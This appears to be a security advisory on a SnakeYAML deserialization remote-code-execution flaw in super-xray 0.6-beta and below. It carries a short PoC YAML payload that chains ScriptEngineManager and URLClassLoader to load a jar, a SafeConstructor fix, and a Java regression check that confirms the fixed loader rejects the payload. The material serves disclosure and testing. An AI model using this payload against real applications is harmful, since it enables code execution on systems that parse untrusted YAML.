Severity
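- Severity level: Moderate
- Attack vector: Local
- Attack complexity: Low
- Privileges required: High
- User interaction: Required
- Scope: Unchanged
- Confidentiality impact: High
- Integrity impact: High
- Availability impact: High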
Vendor
super-xray
Versions Affected
0.6-beta and below
Description
SnakeYAML RCE
PoC:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["file:./yaml.jar"]
]]
]
Fix:
Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
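A regression check for the fix above, added here as an example and not taken from the super-xray code base: it feeds the PoC document from this advisory and a constructed plain settings document to a loader built as in the Fix line. The class name, helper names and sample settings keys are assumptions; SnakeYAML must be on the classpath.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

public class SafeYamlLoadCheck {

    // Loader built as in the Fix line. SafeConstructor only maps standard
    // YAML tags (map, seq, str, int, ...) and refuses global tags such as
    // !!javax.script.ScriptEngineManager instead of instantiating the class.
    static Yaml safeYaml() {
        return new Yaml(new SafeConstructor(new LoaderOptions()));
    }

    // Returns the parsed object, or null when the loader refuses the document.
    static Object loadOrReject(String doc) {
        try {
            return safeYaml().load(doc);
        } catch (YAMLException e) {
            String msg = String.valueOf(e.getMessage());
            System.out.println("rejected: " + msg.split("\n")[0]);
            return null;
        }
    }

    public static void main(String[] args) {
        // The PoC document from this advisory, used as a regression input.
        String poc = String.join("\n",
                "!!javax.script.ScriptEngineManager [",
                "  !!java.net.URLClassLoader [[",
                "    !!java.net.URL [\"file:./yaml.jar\"]",
                "  ]]",
                "]");
        // Constructed sample of an ordinary settings file (hypothetical keys).
        String config = "output: report.html\nthreads: 10\n";

        if (loadOrReject(poc) != null) {
            throw new AssertionError("global tag was constructed; loader is not safe");
        }
        Object parsed = loadOrReject(config);
        if (!(parsed instanceof Map)) {
            throw new AssertionError("plain settings should load as a Map");
        }
        System.out.println("plain settings loaded as: " + parsed);
    }
}
```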
Mitigation
Users should upgrade to super-xray 0.7.
Credit
This issue was discovered by the super-xray development team.